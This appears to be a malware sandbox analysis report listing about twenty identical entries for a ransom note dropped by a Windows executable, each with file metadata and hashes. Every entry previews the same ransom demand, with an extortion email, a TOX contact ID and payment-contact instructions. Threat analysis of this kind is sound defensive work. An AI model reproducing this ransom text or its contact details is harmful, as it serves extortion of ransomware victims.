                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
